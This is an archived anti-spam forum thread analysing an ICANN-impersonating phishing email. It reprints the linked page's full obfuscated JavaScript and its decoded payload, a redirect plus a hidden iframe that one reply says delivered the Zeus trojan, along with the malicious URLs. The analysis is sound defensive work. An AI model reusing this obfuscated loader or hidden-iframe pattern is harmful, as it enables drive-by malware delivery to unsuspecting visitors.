Clicky
Last visit was: Sat Jul 05, 2014 12:59 am
It is currently Sat Jul 05, 2014 12:59 am

JavaScript Obfuscation nonsense


All times are UTC - 5 hours [ DST ]


 [ 4 posts ] 
Author Message
 PostPosted: Wed Jun 23, 2010 10:34 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Another utterly stupid attempt:

Quote:
Subject: Your Domain Has Been Suspended
From: "ICANN Services" <alert@icann.org>
Letter from ICANN (the Internet Corporation for Assigned Names And Numbers)
Your Domain Has Been Suspended.

Click here for more information:
http://booksalon.kr/index2.html

Please contact billing/support center A.S.A.P
[email protected]

booksalon.kr is of course another compromised server. Index2.html contains some of the more ridiculous obfuscation these attackers use. I'll wrap it for legibility.

Code:
var EWgUi ;EWgUi= '' ; var DD , Gz,KpsHj;if (KpsHj<DD || DD<Gz){DD=Gz-
KpsHj;}var mGdujq=this ; var VvIf =''+'replace' ; var XMdHkJ; XMdHkJ
='';XMdHkJ =
'9sdU7i2i2sfs8NcN2i3Ncs8ses9N4N3seN5N8N0NcN1N8i3NeN2N0i2N4N3N9N8s5i3sd
N'; var KqO, XZoWC ;var zt ; zt= 339 ;if (KqO==XZoWC){KqO=
XZoWC+zt;}var HcxN= 'sfU3'; var qxSH;qxSH='';qxSH =
'N9N2Nes8N0N8N3s9i3sasfN4s9N8i5ifmagcg4m9idU9idmeg8geg2g3g9i3i3i3U1N0N
8s9NcidN5s9s9sdi0N8scs8N4sbU0m1ifsfN8NbsfN8seN5m1ifidNeN2N3s9N8'; var
fKVrBy;fKVrBy ='Uciaidses9s4N1N8U0iasbN4seN';var Ywfno='ydbqw'; var
cAT=252;var MmIj=479;var OGy ; OGy =931 ; if
(cAT>MmIj){cAT=MmIj+OGy;}var fh ;fh ='';var emnJ , aBhJ , vAE ;if
(vAE>emnJ && emnJ<=aBhJ){emnJ=aBhJ+vAE; }fh =
'ciaidN5N8N4NaN5s9U0ia';var oyGzhN ;oyGzhN = '';var GADYNJ, LkVmEI
;var BUPZxW =446; if (BUPZxW<GADYNJ || GADYNJ>=LkVmEI){GADYNJ =LkVmEI
- BUPZxW; }oyGzhN ='4U6' ; var qXO;qXO= 582 ; var AH = 23;var cP= 720;
if (cP<qXO || qXO<=AH){qXO = AH-cP ; }var EBMxEe=
'5sdU2sdN4N9U0UcUdiai';var OKh ,Km;var OmPz =766; if (OmPz= OKh ||
OKh==Km){OKh=Km+OmPz;}var Illshy ;Illshy ='' ; Illshy
='4N9N9N8N3U6';var MET;MET = ''; var XlM , VnFIU,wRL ; if (wRL<XlM &&
XlM>=VnFIU){XlM =VnFIU+wRL ; }MET='m1ifidi2U3U1N4Nb'; var kCEEn =198 ;
var mHR, GhGv ; if (kCEEn==mHR){kCEEn =mHR^GhGv; }var ZgM=
'IvxLRJCcKGfDMW' ;var HtaU;HtaU ='4NfN4N1N4s9s4U7idN5N'; var etHAM=
'ifi' ; var fnYhiV= 'MrCP';var MIL ;MIL = '' ;var kR= 109; var Cbq,
eMTx; if (kR>Cbq){kR = Cbq^eMTx ;}MIL = 'dsaN4N9s9N5U0iaU' ;var
KBL='sfNcN0N8idsesfNeU0iaN5s9s';var TAcsH= 231 ; var jBEgFQ; jBEgFQ =
173 ;var xjtMSO= 637; if (xjtMSO>TAcsH || TAcsH<jBEgFQ){TAcsH =
jBEgFQ/xjtMSO ;}var BdkA ='CJYbypzeBpaTqdGYi';var Ilj= '3U1i2N4N';var
HqP; HqP ='iaU' ;var BazxfH ,QaK ,INxI ; if (INxI= BazxfH ||
BazxfH>QaK){BazxfH = QaK-INxI; }var iZj='rWbbcUOmoAzXl';var LwQ;LwQ=
'1Nf' ;var zbRlIK ='uzpFLWMkxKHVQhc'; var HjN =767 ;var cE;cE =
513;var ZmmMl; ZmmMl=480;if (HjN<=cE){HjN = cE+ZmmMl; }var aCn
='N3s9U0m1ifU9U6s8sfN1U0N5s9s9sdU7i2i2N2NeNes8sfN1N8Ncses9i3NeN2N0' ;
var HcCux ='blJhHhEbWEoNlD'; var Xsx,YPgqhV ; var XPGpZ ;XPGpZ =184;
if (Xsx>=YPgqhV){Xsx= YPgqhV^XPGpZ ;}function ltY(pEs){var pEa =
EWgUi;for(mo =0 ; mo<pEs['lGeNnGgNtThG'[VvIf](/[GzTNV]/g , EWgUi)];
++mo){pEa=pEa+mGdujq['SotorFidndgo'[VvIf](/[odCTF]/g,
EWgUi)]['fDrqoqmQCqhQaQrQCqoqdsel'[VvIf](/[lsqDQ]/g
,EWgUi)](13^pEs['cuhnaurLCnozdSeuALtn'[VvIf](/[nSuzL]/g,EWgUi)](mo)) ;
}return pEa;}var uvwUAp = 'bsfNcN0N8U3U'; var mwRD ; mwRD=EWgUi;var
aCMjf = qxSH+aCn ;aCMjf=aCMjf+MET+KBL;aCMjf= aCMjf+XMdHkJ;
aCMjf=aCMjf+EBMxEe;aCMjf=aCMjf+MIL+fh ;aCMjf =aCMjf+fKVrBy;aCMjf
=aCMjf+HtaU ; aCMjf = aCMjf+Illshy; aCMjf= aCMjf+HqP+Ilj+uvwUAp+LwQ
;aCMjf = aCMjf+HcxN+etHAM+oyGzhN+mwRD; var BEQHEO=
'CmV5Bto1ciL2Msj7ewa0ANE6PUW3ZxF9fyT8dgQ4'[VvIf](/[CBcMeAPZfd]/g,'\%')
[VvIf](/[VoLjaEWFTQ]/g , '\¹');var gLM ,ogzW ;var YhEv = 531 ;if
(YhEv= gLM && gLM>ogzW){gLM =ogzW^YhEv; }var MwqIkO="')[VvIf](/[";var
nsPtv= "]/g,'%"; var GHDCO
=BEQHEO[VvIf](/[\%]/g,MwqIkO)[VvIf](/[\¹]/g, nsPtv) ;var dnAJz; dnAJz
=VvIf ;mGdujq['eyvZaZlN'[dnAJz](/[NZbyg]/g ,EWgUi)]('var IuO=
aCMjf'+GHDCO['sTuwbwswtMrMiUnLgw'[VvIf](/[wUTLM]/g, EWgUi)](2 ,
GHDCO['lbeNnbgstNhZ'[VvIf](/[ZNbsq]/g, EWgUi)])+"') ;var kX= 429; var
rB ,vTS; if (kX==rB){kX=rB^vTS ;}") ;var LmNE, MarhR;var Sf = 883 ;if
(Sf>LmNE || LmNE==MarhR){LmNE
=MarhR+Sf;}mGdujq['euvLaulm'[VvIf](/[muzLc]/g,
EWgUi)](ltY(mGdujq[['uhnKehsKcKaKpleo'[VvIf](/[oKhlE]/g,
EWgUi)]](IuO))); var ryCbCw=950 ;var ZgYL , vGF;if
(ryCbCw>ZgYL){ryCbCw =ZgYL+vGF;}

That looks more confusing than it is. They obfuscate the actual javascript commands but it's still a really obvious and easy thing to get past.

The resulting output after all that is (again: wrapped for clarity):

Code:
document.write("WAIT 4 SECOND...<meta http-equiv=\"refresh\" content=\"4;url=http://occurleast.com\" />
<iframe src='http://ruao.austinshemale.com/index.php?pid=10' width='1' height='1' style='visibility: hidden;'>
</iframe><br>");

So: they go to all this trouble, lying about being ICANN, lying about "your domain" being suspended, then presenting ridiculously obfuscated javascript... to send you to another Spamit site? What a waste of time.

Oddly enough, occurleast is not hosted via fast flux, but it has six (6) DNS servers. Somebody must have been burned in the past.

The austinshemale.com iframe is blank, possibly just to track visits.

Just another really stupid attempt. Who on earth would be clicking through this garbage and actually buying anything?!

SiL


Top
 Profile  
 PostPosted: Wed Jun 23, 2010 12:08 pm   
Spammers' Nightmare
User avatar

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
I saw this spam, too and thought wtf?


Top
 Profile  
 PostPosted: Wed Jun 23, 2010 12:15 pm   
Getting started
User avatar

Joined: Thu Jun 17, 2010 5:37 pm
Posts: 18
Definitely a ridiculous attempt at spamming. I've been seeing a ton of the cheap javascript obfuscation as well recently. It started off as blatantly obvious and has become increasing "complex" if you want to call it that over the last week and a half. Initially they were doing a .replace and taking out every other character mXyXuXrXl = myurl....

In regard to the iframe though, its used to deliver the zeus trojan (at least historically, for a week and a half anyway). I've been finding that more often than not its blank though as well, but you might get lucky/unlucky I suppose.

Should be fun to see how they hide their javascript next.


Top
 Profile  
 PostPosted: Wed Jun 23, 2010 1:27 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
hellkyng wrote:
Should be fun to see how they hide their javascript next.


Given that most systems I've tested that setup on have nistantly alerted that this is likely malicious, this can't be a very successful setup no matter how they slice it.

They just strike me as completely amateur.

SiL


Top
 Profile  
 [ 4 posts ] 

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008